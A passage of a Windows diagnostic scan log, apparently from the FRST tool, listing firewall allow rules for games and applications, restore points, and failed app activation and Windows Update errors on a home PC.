    FirewallRules: [{56C40FDB-D1D8-4300-9444-462D37777935}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
    FirewallRules: [{BB33C2C8-BD13-4B46-AB4B-945AB63AD76D}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
    FirewallRules: [UDP Query User{181AB5DD-4B58-40DC-83A7-E0220CA18F90}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [TCP Query User{DF812EF1-9277-44ED-85D2-17CC01EE6A83}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [{86532A14-A6CC-4BFC-BD35-2C868592B80F}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
    FirewallRules: [{AB156E35-4ABB-46D8-9882-87F8777E7C40}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
    FirewallRules: [{CB0E2CEA-ECBD-49C7-B03C-B09F6B9E5F82}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{4A7C1317-3631-4AA3-8955-49385287E4E4}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{E5F6F467-33E1-4473-8BF5-7B02CF2F6AE5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{DD2E394F-C0A9-4BE1-8B27-F31AEDB8A861}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{FCBC243E-7F87-40E3-BDFE-602D2F7F8F84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{F85EFD68-AFA7-42E0-9EB7-24BC00055581}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{DC23B312-10EB-4DEC-96E0-43DA215B3471}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
    FirewallRules: [{1A7C934B-D0B9-45AC-A983-43FF06786E6D}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
    FirewallRules: [{E195526E-E66B-41A6-8D03-D693704045EA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
    FirewallRules: [{757BAA93-318B-49C6-A2AF-697C8B020683}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
    FirewallRules: [UDP Query User{5A46E22D-A3AA-4D71-9164-4444349A2E37}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [TCP Query User{8D040A27-B2B3-48B2-AE4D-CF5A6B2B9575}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [{F2975338-B532-432A-8BB2-E7257A66FB37}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
    FirewallRules: [{A92059AE-40CC-4490-B046-D5E8EB1EA379}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
    FirewallRules: [{E73880A3-C095-497C-BB99-0FF4F9A222C4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
    FirewallRules: [{297EF2CF-1068-49B7-945F-7F71EA277019}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
    FirewallRules: [{4A156579-629D-40A0-AD60-DAF22460B1A0}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
    FirewallRules: [{895120DB-A4F1-47CE-9070-457BFAE3272C}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
    FirewallRules: [{AB2CC394-E9FE-498E-A877-0661AB134F15}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
    FirewallRules: [{9ECAEE5C-41DF-4173-9FD7-BF8A01B28AF5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
    FirewallRules: [{0740F5E2-B69A-40E8-8DD2-D95CC993A671}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
    FirewallRules: [{BAF0FA59-C99C-4003-97DC-FE0050EAE7E6}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
    FirewallRules: [{59C72BBD-55D5-46BB-9D94-83EC35F8C1E6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
    FirewallRules: [{CDB3FF16-5E27-45A8-A944-246B3448C710}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
    FirewallRules: [{15B898B7-E0CD-4607-B1C4-DCA61C30BAF4}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
    FirewallRules: [{F07CB940-6D92-4342-9696-AAD6C596DB2D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
    FirewallRules: [{759D3D16-BF79-4EB7-A210-0BE0F00D3DE2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
    FirewallRules: [{9BF516F4-E2B1-4F2F-A84D-B7092B2B122E}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
    FirewallRules: [{E1DBBBC1-157A-4212-B0D2-AA4DC1A3B620}] => (Allow) LPort=54925
    FirewallRules: [{2250328F-7FF9-4F66-94E8-EE8BCBBF5767}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
    FirewallRules: [{EF4512A5-DBBF-48C4-B269-B56A1B629D96}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
    FirewallRules: [{5E0948FB-AB6B-4342-9299-E743A7E82CD5}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
    FirewallRules: [{24639D5A-3321-4183-A818-D896BC8761C8}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
    FirewallRules: [{F9551992-B61C-4405-BC17-71BDF9CF57AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
    FirewallRules: [{4C4131C5-3599-4D91-8FDE-E5FC28727831}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
    FirewallRules: [{E0C0796F-728A-4514-96B3-64E78C3581F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
    FirewallRules: [{BFAD5EDC-8BE9-42A3-94D2-D4C8457134B0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
    FirewallRules: [{F80F90B0-6FF0-4F96-9E65-E042003CE976}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
    FirewallRules: [{CE810206-FB49-40BF-B541-9EE0F88FCE29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
    FirewallRules: [{F7CE0552-38B5-4F44-9E96-7E7CD1C904DF}] => (Allow) D:\Steam\bin\steamwebhelper.exe
    FirewallRules: [{B4DB672A-158E-45E5-B3B8-D4A3F5026452}] => (Allow) D:\Steam\bin\steamwebhelper.exe
    FirewallRules: [{F4BE57AB-8465-4DAD-8924-6FF609FD1D75}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
    FirewallRules: [{756ED978-037A-4F3D-A428-E87DAF9720E2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
    FirewallRules: [UDP Query User{5C458673-1B35-424D-BAA3-78CAA5394D57}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
    FirewallRules: [TCP Query User{E50AE07B-9053-4BF0-89FE-8539B27A5423}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
    FirewallRules: [{5D946922-67D2-47E1-8E89-CBFE1C6345B1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
    FirewallRules: [{4F7B44EC-2514-42B8-B292-F088413D9EEC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
    FirewallRules: [UDP Query User{CB540F47-8AB3-4B36-B34A-E3824B1FED40}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
    FirewallRules: [TCP Query User{FE0A9CD1-00B6-4747-9F1C-755ACCB4C879}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
    FirewallRules: [{8E6EEA97-8D35-486D-B2B6-A2E9F8BF338C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
    FirewallRules: [{A3FE7E6A-1E6C-4E76-A75D-A4D1DCA0EDC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
    FirewallRules: [{769BECB0-54E0-47E7-9759-ECAF2E28273D}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
    FirewallRules: [{7B0D63B9-31A4-4ADB-8F22-69D31A83D9B8}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
    FirewallRules: [{3B9FA9A3-38E7-41D2-88A1-0BB43DE029BD}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
    FirewallRules: [{74A436A7-8819-4F18-8F60-716D8A0E357E}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
    FirewallRules: [{48B12E80-9B0D-46D9-A92C-7D542E713519}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
    FirewallRules: [{B1560556-55E2-42A6-A2E3-F65F2A7A5E97}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
    FirewallRules: [{75F5A6EB-BD39-4FE4-A690-4ABD347FD037}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{099743C1-9DF8-4750-949F-761AC80ABAC6}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{9F777184-4A13-4D03-A7C0-01D49AEABDDE}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{FCA495C1-8148-4FE6-A6C4-C517B16D4099}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{1E57FFC8-E277-4527-A558-4E533468C4FD}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
    FirewallRules: [{FF7C891B-641F-403F-BDCB-015433DB2BB8}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
    FirewallRules: [{67B411DD-238B-4813-AF90-1F0C53336E41}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
    FirewallRules: [{0B80C1B4-520A-43F6-A486-2689BB9F4589}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
    FirewallRules: [{D1348AB0-4C36-4E08-AEE7-833E635A6B76}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
    FirewallRules: [{7FC743AA-D733-419F-8042-A035AD45F3B5}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
    FirewallRules: [{F5F95BD3-A35E-44EE-A112-E2F68B3D3A0A}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
    FirewallRules: [{112C8525-A869-473F-A5AE-968AEB8835F7}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
    FirewallRules: [{20B0CC62-3200-4EEF-B0B7-37B644402890}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
    FirewallRules: [{EF08C331-87FB-4CC5-ACB3-8EE65B40BA62}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
    FirewallRules: [{BF9681B5-75E6-4BB8-A9E8-33A6536FD70F}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
    FirewallRules: [{D7D86F73-58B4-4297-BD11-31694ED9AAE0}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
    FirewallRules: [{DD0DCF4C-E8E1-49DD-900A-DD6AC7BC5C3C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
    FirewallRules: [{CF01C627-5181-49F6-8E87-A4C0CBDD7CA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
    FirewallRules: [{7E20D8C2-63C2-4175-95E6-1343C3ECD0C6}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
    FirewallRules: [{491A2AED-C695-4F06-BA71-CB7838E9C4FF}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
    FirewallRules: [{5E2969A1-BE68-4265-A8FC-7097A7ECBB11}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
    FirewallRules: [{74E554AC-E08A-4335-B417-29987ADE8453}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
    FirewallRules: [{A03CA821-5944-4FD4-AA99-63D9A7D540E2}] => (Allow) D:\Hearthstone\Hearthstone.exe
    FirewallRules: [{7D59F7B3-275B-4781-B5B3-F54F6611ABE6}] => (Allow) D:\Hearthstone\Hearthstone.exe
    FirewallRules: [{A01AFC7A-FADD-4E17-B5C6-7189DE2CD1CE}] => (Allow) D:\StarCraft II\StarCraft II.exe
    FirewallRules: [{700AEC12-F515-4E9F-AE1F-ACFE78622256}] => (Allow) D:\StarCraft II\StarCraft II.exe
    FirewallRules: [{ABA0ADF7-7B84-4F79-85B1-13F0FF4024DE}] => (Allow) D:\Diablo III\Diablo III.exe
    FirewallRules: [{6CF41658-1CD6-4500-AC43-A82F127ACABB}] => (Allow) D:\Diablo III\Diablo III.exe
    FirewallRules: [{C2481D3E-C354-4753-BD12-A8F578C331BF}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
    FirewallRules: [{16888A73-5F47-429F-A727-2E2184704346}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
    FirewallRules: [{7CD9AF2C-6572-4973-B88A-D6A325B74B4F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
    FirewallRules: [{F9A7B398-94AE-45D6-8514-BEA802B1E5E2}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
    FirewallRules: [{512EF9C6-D108-459F-8832-0603753D2F89}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{B598ABAB-0FDC-43A9-BD15-FF9FF99D712C}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{E4955EAC-E367-495F-B0A4-89B8B7610B29}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{416A0B8C-2763-42F0-82EB-9269719E1BE4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{15969D30-C471-468E-B2ED-1594FE384FC3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{08FE19D4-7434-48EA-A27A-93ED53D7717A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{933A444B-2C3D-45AC-80E9-EFE8EB8DAD9D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{EF266A5B-42EB-4853-A982-4DED1ADF6F73}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
    FirewallRules: [{BC4FFE1F-5AF4-4233-8E52-5094D6FE9F07}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
    FirewallRules: [{31F097A5-8E00-4169-A16D-1C9A71721FA1}] => (Allow) D:\Steam\Steam.exe
    FirewallRules: [{F5C42520-0135-45B4-8FB0-5BD9692C80EE}] => (Allow) D:\Steam\Steam.exe
    FirewallRules: [TCP Query User{3D2AB9FC-2A79-4098-9681-6706A621D53F}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
    FirewallRules: [UDP Query User{09124E07-AE4B-4C80-A7E2-E96A37034496}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
    FirewallRules: [{923D26F5-A4EE-433D-BE2B-5CE473180539}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
    FirewallRules: [{E6F2E9A0-F842-4541-8D31-CE38FDD09EDE}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
    FirewallRules: [{F906BBDC-3C41-494C-A264-2234D81FEF3E}] => (Block) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Adobe Premiere Elements 11\Adobe Premiere Elements.exe
    FirewallRules: [{BD0F045D-D2C0-41A7-8024-69C5F302A95F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
    FirewallRules: [{7710A3C2-777C-4F45-BA7E-19121D633EB3}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
    FirewallRules: [{7172F858-7B10-43BC-B718-09A53F078F3C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{6B94AB4E-EBC9-430B-A32F-B62386B68D88}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{F70F4B42-49F1-4B1A-B8A8-FCF794C81494}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{045729B0-69AA-489E-BE8C-C51AC1A7B953}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{92708362-07EC-40D9-A2DB-B96340F268FB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
    FirewallRules: [{4B096532-9213-4604-8B21-D8BCE26411CE}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
    FirewallRules: [{0104B469-8DD7-41D2-9979-185C8C113A44}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
    FirewallRules: [{83A03678-B554-4993-9E39-0C22F10E135B}] => (Allow) D:\SPSS\stats.com
    FirewallRules: [{091CE1FB-5C3F-4138-8341-49FEB2CFD24B}] => (Allow) D:\SPSS\stats.exe
    FirewallRules: [{9576161E-2723-4775-B358-84BB54C518DA}] => (Allow) D:\SPSS\stats.com
    FirewallRules: [{5CABC212-DC4A-4B5F-A0FE-532EA8330453}] => (Allow) D:\SPSS\stats.exe
    FirewallRules: [{394EAA14-7FAC-47B7-B3D9-7B4756AB1A7B}] => (Allow) D:\SPSS\WinWrapIDE.exe
    FirewallRules: [{16A7A8A5-316D-425F-870E-5896D1CE4C33}] => (Allow) D:\SPSS\WinWrapIDE.exe
    FirewallRules: [{79364F63-7C39-456E-AB8F-8757D05D824C}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
    FirewallRules: [{54FF873C-F71A-4CCF-8775-0C1D01F98DE2}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
    FirewallRules: [{3B43C12B-BCDF-45BF-B840-0535E1E51BB0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
    FirewallRules: [{E52DF45C-B750-4C08-A94D-1C9E5FD0C9E0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
    FirewallRules: [TCP Query User{5FA1C1D8-35DC-4C59-B59E-E79663992D79}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
    FirewallRules: [UDP Query User{B382372C-70E0-4294-8918-424DD03F9B35}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
    FirewallRules: [{779D02B6-A237-497E-8EA6-A0FE4181802E}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
    FirewallRules: [{8F8BCB79-A539-484F-91B1-F34943ED9B63}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
    FirewallRules: [{FA6B12F6-052C-4390-B321-7E5ED5365770}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
    FirewallRules: [{FD71A44F-D3A8-4A46-B9B5-A3FFF96D2B7A}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
    FirewallRules: [{3E390A03-0EC6-460A-AFF8-07A3B3CE42A7}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{F56F3DD1-6F01-4E52-AF5A-050CF4A4240E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{133D51D8-9D57-49D0-A255-8F344FBE942D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{7EFE47F1-0DAB-47F3-BB87-FB89C0045DAF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{3D3C4B45-00E1-45D2-A21E-63FFE437D631}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
    StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

    ==================== Restore Points =========================

    12-02-2016 19:34:43 Windows Update
    15-02-2016 13:41:32 Windows Backup
    18-02-2016 15:21:16 Windows Update
    21-02-2016 16:50:40 Windows Update
    21-02-2016 19:00:07 Windows Backup
    28-02-2016 19:00:09 Windows Backup
    01-03-2016 12:19:24 Restore Point Created by FRST
    01-03-2016 12:35:23 JRT Pre-Junkware Removal

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (03/01/2016 12:50:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:50:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:48:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:35:24 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
    Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

    Details:
    AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

    System Error:
    Access is denied.
    .

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (03/01/2016 12:34:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
    Description: Activation of app Microsoft.WindowsStore_8wekyb3d8bbwe!App failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.


    System errors:
    =============
    Error: (03/01/2016 12:52:06 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

    Error: (03/01/2016 12:52:03 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

    Error: (03/01/2016 12:51:58 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

    Error: (03/01/2016 12:51:56 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

    Error: (03/01/2016 12:51:27 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.

    Error: (03/01/2016 12:51:27 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.

    Error: (03/01/2016 12:51:22 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.

    Error: (03/01/2016 12:51:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.

    Error: (03/01/2016 12:51:10 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Maps.

    Error: (03/01/2016 12:51:08 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
    Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Maps.


    CodeIntegrity:
    ===================================
    Date: 2016-02-13 23:54:36.285
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.256
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.214
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.157
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.135
